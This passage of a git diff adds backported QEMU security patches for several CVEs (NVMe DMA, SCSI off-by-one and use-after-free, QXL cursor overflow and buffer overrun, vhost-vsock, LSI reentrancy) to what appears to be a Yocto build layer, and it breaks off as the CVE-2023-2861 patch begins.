173 #define MEMTX_DECODE_ERROR (1U << 1) /* nothing at that address */
174+#define MEMTX_ACCESS_ERROR (1U << 2) /* access denied */
175 typedef uint32_t MemTxResult;
176
177 #endif
178--
1792.25.1
180
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch
new file mode 100644
index 0000000000..a1862f1226
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch
@@ -0,0 +1,81 @@
1From 2c682b5975b41495f98cc34b8243042c446eec44 Mon Sep 17 00:00:00 2001
2From: Gaurav Gupta <gauragup@cisco.com>
3Date: Wed, 29 Mar 2023 14:36:16 -0700
4Subject: [PATCH] hw/nvme: fix CVE-2021-3929 MIME-Version: 1.0 Content-Type:
5 text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10This fixes CVE-2021-3929 "locally" by denying DMA to the iomem of the
11device itself. This still allows DMA to MMIO regions of other devices
12(e.g. doing P2P DMA to the controller memory buffer of another NVMe
13device).
14
15Fixes: CVE-2021-3929
16Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
17Reviewed-by: Keith Busch <kbusch@kernel.org>
18Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
19Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
20
21Upstream-Status: Backport
22[https://gitlab.com/qemu-project/qemu/-/commit/736b01642d85be832385]
23CVE: CVE-2021-3929
24Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
25Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
26---
27 hw/block/nvme.c | 23 +++++++++++++++++++++++
28 hw/block/nvme.h | 1 +
29 2 files changed, 24 insertions(+)
30
31diff --git a/hw/block/nvme.c b/hw/block/nvme.c
32index bda446d..ae9b19f 100644
33--- a/hw/block/nvme.c
34+++ b/hw/block/nvme.c
35@@ -60,8 +60,31 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
36 return addr >= low && addr < hi;
37 }
38
39+static inline bool nvme_addr_is_iomem(NvmeCtrl *n, hwaddr addr)
40+{
41+ hwaddr hi, lo;
42+
43+ /*
44+ * The purpose of this check is to guard against invalid "local" access to
45+ * the iomem (i.e. controller registers). Thus, we check against the range
46+ * covered by the 'bar0' MemoryRegion since that is currently composed of
47+ * two subregions (the NVMe "MBAR" and the MSI-X table/pba). Note, however,
48+ * that if the device model is ever changed to allow the CMB to be located
49+ * in BAR0 as well, then this must be changed.
50+ */
51+ lo = n->bar0.addr;
52+ hi = lo + int128_get64(n->bar0.size);
53+
54+ return addr >= lo && addr < hi;
55+}
56+
57 static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
58 {
59+
60+ if (nvme_addr_is_iomem(n, addr)) {
61+ return NVME_DATA_TRAS_ERROR;
62+ }
63+
64 if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
65 memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
66 return 0;
67diff --git a/hw/block/nvme.h b/hw/block/nvme.h
68index 557194e..5a2b119 100644
69--- a/hw/block/nvme.h
70+++ b/hw/block/nvme.h
71@@ -59,6 +59,7 @@ typedef struct NvmeNamespace {
72
73 typedef struct NvmeCtrl {
74 PCIDevice parent_obj;
75+ MemoryRegion bar0;
76 MemoryRegion iomem;
77 MemoryRegion ctrl_mem;
78 NvmeBar bar;
79--
801.8.3.1
81
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch
new file mode 100644
index 0000000000..b1b5558647
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch
@@ -0,0 +1,53 @@
1From b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8 Mon Sep 17 00:00:00 2001
2From: Mauro Matteo Cascella <mcascell@redhat.com>
3Date: Thu, 4 Nov 2021 17:31:38 +0100
4Subject: [PATCH] hw/scsi/scsi-disk: MODE_PAGE_ALLS not allowed in MODE SELECT
5 commands
6
7This avoids an off-by-one read of 'mode_sense_valid' buffer in
8hw/scsi/scsi-disk.c:mode_sense_page().
9
10Fixes: CVE-2021-3930
11Cc: qemu-stable@nongnu.org
12Reported-by: Alexander Bulekov <alxndr@bu.edu>
13Fixes: a8f4bbe2900 ("scsi-disk: store valid mode pages in a table")
14Fixes: #546
15Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
16Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
17Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
18
19https://gitlab.com/qemu-project/qemu/-/commit/b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8
20CVE: CVE-2021-3930
21Upstream-Status: Backport
22Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
23---
24 hw/scsi/scsi-disk.c | 6 ++++++
25 1 file changed, 6 insertions(+)
26
27diff --git a/hw/scsi/scsi-disk.c b/hw/scsi/scsi-disk.c
28index e8a547dbb7..d4914178ea 100644
29--- a/hw/scsi/scsi-disk.c
30+++ b/hw/scsi/scsi-disk.c
31@@ -1087,6 +1087,7 @@ static int mode_sense_page(SCSIDiskState *s, int page, uint8_t **p_outbuf,
32 uint8_t *p = *p_outbuf + 2;
33 int length;
34
35+ assert(page < ARRAY_SIZE(mode_sense_valid));
36 if ((mode_sense_valid[page] & (1 << s->qdev.type)) == 0) {
37 return -1;
38 }
39@@ -1428,6 +1429,11 @@ static int scsi_disk_check_mode_select(SCSIDiskState *s, int page,
40 return -1;
41 }
42
43+ /* MODE_PAGE_ALLS is only valid for MODE SENSE commands */
44+ if (page == MODE_PAGE_ALLS) {
45+ return -1;
46+ }
47+
48 p = mode_current;
49 memset(mode_current, 0, inlen + 2);
50 len = mode_sense_page(s, page, &p, 0);
51--
52GitLab
53
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch
new file mode 100644
index 0000000000..80ad49e4ed
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch
@@ -0,0 +1,89 @@
1From fa892e9abb728e76afcf27323ab29c57fb0fe7aa Mon Sep 17 00:00:00 2001
2From: Mauro Matteo Cascella <mcascell@redhat.com>
3Date: Thu, 7 Apr 2022 10:17:12 +0200
4Subject: [PATCH] ui/cursor: fix integer overflow in cursor_alloc
5 (CVE-2021-4206)
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Prevent potential integer overflow by limiting 'width' and 'height' to
11512x512. Also change 'datasize' type to size_t. Refer to security
12advisory https://starlabs.sg/advisories/22-4206/ for more information.
13
14Fixes: CVE-2021-4206
15Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
16Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
17Message-Id: <20220407081712.345609-1-mcascell@redhat.com>
18Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
19
20https://gitlab.com/qemu-project/qemu/-/commit/fa892e9a
21CVE: CVE-2021-4206
22Upstream-Status: Backport
23Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
24---
25 hw/display/qxl-render.c | 7 +++++++
26 hw/display/vmware_vga.c | 2 ++
27 ui/cursor.c | 8 +++++++-
28 3 files changed, 16 insertions(+), 1 deletion(-)
29
30diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
31index 237ed293ba..ca217004bf 100644
32--- a/hw/display/qxl-render.c
33+++ b/hw/display/qxl-render.c
34@@ -247,6 +247,13 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
35 size_t size;
36
37 c = cursor_alloc(cursor->header.width, cursor->header.height);
38+
39+ if (!c) {
40+ qxl_set_guest_bug(qxl, "%s: cursor %ux%u alloc error", __func__,
41+ cursor->header.width, cursor->header.height);
42+ goto fail;
43+ }
44+
45 c->hot_x = cursor->header.hot_spot_x;
46 c->hot_y = cursor->header.hot_spot_y;
47 switch (cursor->header.type) {
48diff --git a/hw/display/vmware_vga.c b/hw/display/vmware_vga.c
49index 98c83474ad..45d06cbe25 100644
50--- a/hw/display/vmware_vga.c
51+++ b/hw/display/vmware_vga.c
52@@ -515,6 +515,8 @@ static inline void vmsvga_cursor_define(struct vmsvga_state_s *s,
53 int i, pixels;
54
55 qc = cursor_alloc(c->width, c->height);
56+ assert(qc != NULL);
57+
58 qc->hot_x = c->hot_x;
59 qc->hot_y = c->hot_y;
60 switch (c->bpp) {
61diff --git a/ui/cursor.c b/ui/cursor.c
62index 1d62ddd4d0..835f0802f9 100644
63--- a/ui/cursor.c
64+++ b/ui/cursor.c
65@@ -46,6 +46,8 @@ static QEMUCursor *cursor_parse_xpm(const char *xpm[])
66
67 /* parse pixel data */
68 c = cursor_alloc(width, height);
69+ assert(c != NULL);
70+
71 for (pixel = 0, y = 0; y < height; y++, line++) {
72 for (x = 0; x < height; x++, pixel++) {
73 idx = xpm[line][x];
74@@ -91,7 +93,11 @@ QEMUCursor *cursor_builtin_left_ptr(void)
75 QEMUCursor *cursor_alloc(int width, int height)
76 {
77 QEMUCursor *c;
78- int datasize = width * height * sizeof(uint32_t);
79+ size_t datasize = width * height * sizeof(uint32_t);
80+
81+ if (width > 512 || height > 512) {
82+ return NULL;
83+ }
84
85 c = g_malloc0(sizeof(QEMUCursor) + datasize);
86 c->width = width;
87--
88GitLab
89
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch
new file mode 100644
index 0000000000..8418246247
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch
@@ -0,0 +1,43 @@
1From 9569f5cb5b4bffa9d3ebc8ba7da1e03830a9a895 Mon Sep 17 00:00:00 2001
2From: Mauro Matteo Cascella <mcascell@redhat.com>
3Date: Thu, 7 Apr 2022 10:11:06 +0200
4Subject: [PATCH] display/qxl-render: fix race condition in qxl_cursor
5 (CVE-2021-4207)
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Avoid fetching 'width' and 'height' a second time to prevent possible
11race condition. Refer to security advisory
12https://starlabs.sg/advisories/22-4207/ for more information.
13
14Fixes: CVE-2021-4207
15Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
16Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
17Message-Id: <20220407081106.343235-1-mcascell@redhat.com>
18Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
19
20https://gitlab.com/qemu-project/qemu/-/commit/9569f5cb
21CVE: CVE-2021-4207
22Upstream-Status: Backport
23Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
24---
25 hw/display/qxl-render.c | 2 +-
26 1 file changed, 1 insertion(+), 1 deletion(-)
27
28diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
29index d28849b121..237ed293ba 100644
30--- a/hw/display/qxl-render.c
31+++ b/hw/display/qxl-render.c
32@@ -266,7 +266,7 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
33 }
34 break;
35 case SPICE_CURSOR_TYPE_ALPHA:
36- size = sizeof(uint32_t) * cursor->header.width * cursor->header.height;
37+ size = sizeof(uint32_t) * c->width * c->height;
38 qxl_unpack_chunks(c->data, size, qxl, &cursor->chunk, group_id);
39 if (qxl->debug > 2) {
40 cursor_print_ascii_art(c, "qxl/alpha");
41--
42GitLab
43
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch
new file mode 100644
index 0000000000..6a7ce0e26c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch
@@ -0,0 +1,42 @@
1From 6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8 Mon Sep 17 00:00:00 2001
2From: Mauro Matteo Cascella <mcascell@redhat.com>
3Date: Tue, 5 Jul 2022 22:05:43 +0200
4Subject: [PATCH] scsi/lsi53c895a: fix use-after-free in lsi_do_msgout
5 (CVE-2022-0216)
6
7Set current_req->req to NULL to prevent reusing a free'd buffer in case of
8repeated SCSI cancel requests. Thanks to Thomas Huth for suggesting the patch.
9
10Fixes: CVE-2022-0216
11Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
12Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
13Reviewed-by: Thomas Huth <thuth@redhat.com>
14Message-Id: <20220705200543.2366809-1-mcascell@redhat.com>
15Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
16
17https://gitlab.com/qemu-project/qemu/-/commit/6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8
18CVE: CVE-2022-0216
19Upstream-Status: Backport
20Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
21---
22 hw/scsi/lsi53c895a.c | 3 ++-
23 1 file changed, 2 insertions(+), 1 deletion(-)
24
25diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
26index c8773f73f7..99ea42d49b 100644
27--- a/hw/scsi/lsi53c895a.c
28+++ b/hw/scsi/lsi53c895a.c
29@@ -1028,8 +1028,9 @@ static void lsi_do_msgout(LSIState *s)
30 case 0x0d:
31 /* The ABORT TAG message clears the current I/O process only. */
32 trace_lsi_do_msgout_abort(current_tag);
33- if (current_req) {
34+ if (current_req && current_req->req) {
35 scsi_req_cancel(current_req->req);
36+ current_req->req = NULL;
37 }
38 lsi_disconnect(s);
39 break;
40--
41GitLab
42
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch
new file mode 100644
index 0000000000..137906cd30
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch
@@ -0,0 +1,52 @@
1From 4367a20cc442c56b05611b4224de9a61908f9eac Mon Sep 17 00:00:00 2001
2From: Mauro Matteo Cascella <mcascell@redhat.com>
3Date: Mon, 11 Jul 2022 14:33:16 +0200
4Subject: [PATCH] scsi/lsi53c895a: really fix use-after-free in lsi_do_msgout
5 (CVE-2022-0216)
6
7Set current_req to NULL, not current_req->req, to prevent reusing a free'd
8buffer in case of repeated SCSI cancel requests. Also apply the fix to
9CLEAR QUEUE and BUS DEVICE RESET messages as well, since they also cancel
10the request.
11
12Thanks to Alexander Bulekov for providing a reproducer.
13
14Fixes: CVE-2022-0216
15Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
16Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
17Tested-by: Alexander Bulekov <alxndr@bu.edu>
18Message-Id: <20220711123316.421279-1-mcascell@redhat.com>
19Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
20
21https://gitlab.com/qemu-project/qemu/-/commit/4367a20cc4
22CVE: CVE-2022-0216
23Upstream-Status: Backport
24Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
25---
26 hw/scsi/lsi53c895a.c | 3 +-
27 1 files changed, 2 insertions(+), 1 deletion(-)
28
29diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
30index 99ea42d49b..ad5f5e5f39 100644
31--- a/hw/scsi/lsi53c895a.c
32+++ b/hw/scsi/lsi53c895a.c
33@@ -1030,7 +1030,7 @@ static void lsi_do_msgout(LSIState *s)
34 trace_lsi_do_msgout_abort(current_tag);
35 if (current_req && current_req->req) {
36 scsi_req_cancel(current_req->req);
37- current_req->req = NULL;
38+ current_req = NULL;
39 }
40 lsi_disconnect(s);
41 break;
42@@ -1056,6 +1056,7 @@ static void lsi_do_msgout(LSIState *s)
43 /* clear the current I/O process */
44 if (s->current) {
45 scsi_req_cancel(s->current->req);
46+ current_req = NULL;
47 }
48
49 /* As the current implemented devices scsi_disk and scsi_generic
50--
51GitLab
52
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch
new file mode 100644
index 0000000000..fc4d6cf3df
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch
@@ -0,0 +1,57 @@
1Backport of:
2
3From 8d1b247f3748ac4078524130c6d7ae42b6140aaf Mon Sep 17 00:00:00 2001
4From: Stefano Garzarella <sgarzare@redhat.com>
5Date: Mon, 28 Feb 2022 10:50:58 +0100
6Subject: [PATCH] vhost-vsock: detach the virqueue element in case of error
7
8In vhost_vsock_common_send_transport_reset(), if an element popped from
9the virtqueue is invalid, we should call virtqueue_detach_element() to
10detach it from the virtqueue before freeing its memory.
11
12Fixes: fc0b9b0e1c ("vhost-vsock: add virtio sockets device")
13Fixes: CVE-2022-26354
14Cc: qemu-stable@nongnu.org
15Reported-by: VictorV <vv474172261@gmail.com>
16Signed-off-by: Stefano Garzarella <sgarzare@redhat.com>
17Message-Id: <20220228095058.27899-1-sgarzare@redhat.com>
18Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
19Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
20Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
21
22CVE: CVE-2022-26354
23Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2022-26354.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8d1b247f3748ac4078524130c6d7ae42b6140aaf ]
24Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
25---
26 hw/virtio/vhost-vsock-common.c | 10 +++++++---
27 1 file changed, 7 insertions(+), 3 deletions(-)
28
29--- a/hw/virtio/vhost-vsock.c
30+++ b/hw/virtio/vhost-vsock.c
31@@ -221,19 +221,23 @@ static void vhost_vsock_send_transport_r
32 if (elem->out_num) {
33 error_report("invalid vhost-vsock event virtqueue element with "
34 "out buffers");
35- goto out;
36+ goto err;
37 }
38
39 if (iov_from_buf(elem->in_sg, elem->in_num, 0,
40 &event, sizeof(event)) != sizeof(event)) {
41 error_report("vhost-vsock event virtqueue element is too short");
42- goto out;
43+ goto err;
44 }
45
46 virtqueue_push(vq, elem, sizeof(event));
47 virtio_notify(VIRTIO_DEVICE(vsock), vq);
48
49-out:
50+ g_free(elem);
51+ return;
52+
53+err:
54+ virtqueue_detach_element(vq, elem, 0);
55 g_free(elem);
56 }
57
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch
new file mode 100644
index 0000000000..4196ebcf98
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch
@@ -0,0 +1,53 @@
1From 09a07b5b39c87423df9e8f6574c19a14d36beac5 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Wed, 27 Jul 2022 10:34:12 +0530
4Subject: [PATCH] CVE-2022-35414
5
6Upstream-Status: Backport [https://github.com/qemu/qemu/commit/418ade7849ce7641c0f7333718caf5091a02fd4c]
7CVE: CVE-2022-35414
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 exec.c | 13 ++++++++++++-
11 1 file changed, 12 insertions(+), 1 deletion(-)
12
13diff --git a/exec.c b/exec.c
14index 43c70ffb..2d6add46 100644
15--- a/exec.c
16+++ b/exec.c
17@@ -685,7 +685,7 @@ static void tcg_iommu_free_notifier_list(CPUState *cpu)
18
19 /* Called from RCU critical section */
20 MemoryRegionSection *
21-address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
22+address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr orig_addr,
23 hwaddr *xlat, hwaddr *plen,
24 MemTxAttrs attrs, int *prot)
25 {
26@@ -694,6 +694,7 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
27 IOMMUMemoryRegionClass *imrc;
28 IOMMUTLBEntry iotlb;
29 int iommu_idx;
30+ hwaddr addr = orig_addr;
31 AddressSpaceDispatch *d = atomic_rcu_read(&cpu->cpu_ases[asidx].memory_dispatch);
32
33 for (;;) {
34@@ -737,6 +738,16 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
35 return section;
36
37 translate_fail:
38+ /*
39+ * We should be given a page-aligned address -- certainly
40+ * tlb_set_page_with_attrs() does so. The page offset of xlat
41+ * is used to index sections[], and PHYS_SECTION_UNASSIGNED = 0.
42+ * The page portion of xlat will be logged by memory_region_access_valid()
43+ * when this memory access is rejected, so use the original untranslated
44+ * physical address.
45+ */
46+ assert((orig_addr & ~TARGET_PAGE_MASK) == 0);
47+ *xlat = orig_addr;
48 return &d->map.sections[PHYS_SECTION_UNASSIGNED];
49 }
50 #endif
51--
522.25.1
53
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch
new file mode 100644
index 0000000000..3f0d5fbd5c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch
@@ -0,0 +1,103 @@
1From 6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
3Date: Mon, 28 Nov 2022 21:27:40 +0100
4Subject: [PATCH] hw/display/qxl: Avoid buffer overrun in qxl_phys2virt
5 (CVE-2022-4144)
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Have qxl_get_check_slot_offset() return false if the requested
11buffer size does not fit within the slot memory region.
12
13Similarly qxl_phys2virt() now returns NULL in such case, and
14qxl_dirty_one_surface() aborts.
15
16This avoids buffer overrun in the host pointer returned by
17memory_region_get_ram_ptr().
18
19Fixes: CVE-2022-4144 (out-of-bounds read)
20Reported-by: Wenxu Yin (@awxylitol)
21Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1336
22
23Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
24Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
25Message-Id: <20221128202741.4945-5-philmd@linaro.org>
26
27Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622]
28CVE: CVE-2022-4144
29Comments: Deleted patch hunk in qxl.h,as it contains change
30in comments which is not present in current version of qemu.
31
32Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
33---
34 hw/display/qxl.c | 27 +++++++++++++++++++++++----
35 1 file changed, 23 insertions(+), 4 deletions(-)
36
37diff --git a/hw/display/qxl.c b/hw/display/qxl.c
38index cd7eb39d..6bc8385b 100644
39--- a/hw/display/qxl.c
40+++ b/hw/display/qxl.c
41@@ -1440,11 +1440,13 @@ static void qxl_reset_surfaces(PCIQXLDevice *d)
42
43 /* can be also called from spice server thread context */
44 static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
45- uint32_t *s, uint64_t *o)
46+ uint32_t *s, uint64_t *o,
47+ size_t size_requested)
48 {
49 uint64_t phys = le64_to_cpu(pqxl);
50 uint32_t slot = (phys >> (64 - 8)) & 0xff;
51 uint64_t offset = phys & 0xffffffffffff;
52+ uint64_t size_available;
53
54 if (slot >= NUM_MEMSLOTS) {
55 qxl_set_guest_bug(qxl, "slot too large %d >= %d", slot,
56@@ -1468,6 +1470,23 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
57 slot, offset, qxl->guest_slots[slot].size);
58 return false;
59 }
60+ size_available = memory_region_size(qxl->guest_slots[slot].mr);
61+ if (qxl->guest_slots[slot].offset + offset >= size_available) {
62+ qxl_set_guest_bug(qxl,
63+ "slot %d offset %"PRIu64" > region size %"PRIu64"\n",
64+ slot, qxl->guest_slots[slot].offset + offset,
65+ size_available);
66+ return false;
67+ }
68+ size_available -= qxl->guest_slots[slot].offset + offset;
69+ if (size_requested > size_available) {
70+ qxl_set_guest_bug(qxl,
71+ "slot %d offset %"PRIu64" size %zu: "
72+ "overrun by %"PRIu64" bytes\n",
73+ slot, offset, size_requested,
74+ size_requested - size_available);
75+ return false;
76+ }
77
78 *s = slot;
79 *o = offset;
80@@ -1486,7 +1505,7 @@ void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
81 offset = le64_to_cpu(pqxl) & 0xffffffffffff;
82 return (void *)(intptr_t)offset;
83 case MEMSLOT_GROUP_GUEST:
84- if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset)) {
85+ if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
86 return NULL;
87 }
88 ptr = memory_region_get_ram_ptr(qxl->guest_slots[slot].mr);
89@@ -1944,9 +1963,9 @@ static void qxl_dirty_one_surface(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
90 uint32_t slot;
91 bool rc;
92
93- rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset);
94- assert(rc == true);
95 size = (uint64_t)height * abs(stride);
96+ rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size);
97+ assert(rc == true);
98 trace_qxl_surfaces_dirty(qxl->id, offset, size);
99 qxl_set_dirty(qxl->guest_slots[slot].mr,
100 qxl->guest_slots[slot].offset + offset,
101--
1022.25.1
103
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch
new file mode 100644
index 0000000000..26e22b4c31
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch
@@ -0,0 +1,77 @@
1[Ubuntu note: remove fuzz-lsi53c895a-test.c changes since the file does not
2 exist for this release]
3From b987718bbb1d0eabf95499b976212dd5f0120d75 Mon Sep 17 00:00:00 2001
4From: Thomas Huth <thuth@redhat.com>
5Date: Mon, 22 May 2023 11:10:11 +0200
6Subject: [PATCH] hw/scsi/lsi53c895a: Fix reentrancy issues in the LSI
7 controller (CVE-2023-0330)
8
9We cannot use the generic reentrancy guard in the LSI code, so
10we have to manually prevent endless reentrancy here. The problematic
11lsi_execute_script() function has already a way to detect whether
12too many instructions have been executed - we just have to slightly
13change the logic here that it also takes into account if the function
14has been called too often in a reentrant way.
15
16The code in fuzz-lsi53c895a-test.c has been taken from an earlier
17patch by Mauro Matteo Cascella.
18
19Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1563
20Message-Id: <20230522091011.1082574-1-thuth@redhat.com>
21Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
22Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
23Signed-off-by: Thomas Huth <thuth@redhat.com>
24
25Reference: https://launchpad.net/ubuntu/+source/qemu/1:4.2-3ubuntu6.27
26
27Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2023-0330.patch?h=ubuntu/focal-security
28Upstream commit https://gitlab.com/qemu-project/qemu/-/commit/b987718bbb1d0eabf95499b976212dd5f0120d75]
29CVE: CVE-2023-0330
30Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
31---
32 hw/scsi/lsi53c895a.c | 23 +++++++++++++++------
33 tests/qtest/fuzz-lsi53c895a-test.c | 33 ++++++++++++++++++++++++++++++
34 2 files changed, 50 insertions(+), 6 deletions(-)
35
36--- qemu-4.2.orig/hw/scsi/lsi53c895a.c
37+++ qemu-4.2/hw/scsi/lsi53c895a.c
38@@ -1135,15 +1135,24 @@ static void lsi_execute_script(LSIState
39 uint32_t addr, addr_high;
40 int opcode;
41 int insn_processed = 0;
42+ static int reentrancy_level;
43+
44+ reentrancy_level++;
45
46 s->istat1 |= LSI_ISTAT1_SRUN;
47 again:
48- if (++insn_processed > LSI_MAX_INSN) {
49- /* Some windows drivers make the device spin waiting for a memory
50- location to change. If we have been executed a lot of code then
51- assume this is the case and force an unexpected device disconnect.
52- This is apparently sufficient to beat the drivers into submission.
53- */
54+ /*
55+ * Some windows drivers make the device spin waiting for a memory location
56+ * to change. If we have executed more than LSI_MAX_INSN instructions then
57+ * assume this is the case and force an unexpected device disconnect. This
58+ * is apparently sufficient to beat the drivers into submission.
59+ *
60+ * Another issue (CVE-2023-0330) can occur if the script is programmed to
61+ * trigger itself again and again. Avoid this problem by stopping after
62+ * being called multiple times in a reentrant way (8 is an arbitrary value
63+ * which should be enough for all valid use cases).
64+ */
65+ if (++insn_processed > LSI_MAX_INSN || reentrancy_level > 8) {
66 if (!(s->sien0 & LSI_SIST0_UDC)) {
67 qemu_log_mask(LOG_GUEST_ERROR,
68 "lsi_scsi: inf. loop with UDC masked");
69@@ -1597,6 +1606,8 @@ again:
70 }
71 }
72 trace_lsi_execute_script_stop();
73+
74+ reentrancy_level--;
75 }
76
77 static uint8_t lsi_reg_readb(LSIState *s, int offset)
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch
new file mode 100644
index 0000000000..70b7d6c562
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch
@@ -0,0 +1,178 @@
1From f6b0de53fb87ddefed348a39284c8e2f28dc4eda Mon Sep 17 00:00:00 2001
2From: Christian Schoenebeck <qemu_oss@crudebyte.com>
3Date: Wed, 7 Jun 2023 18:29:33 +0200
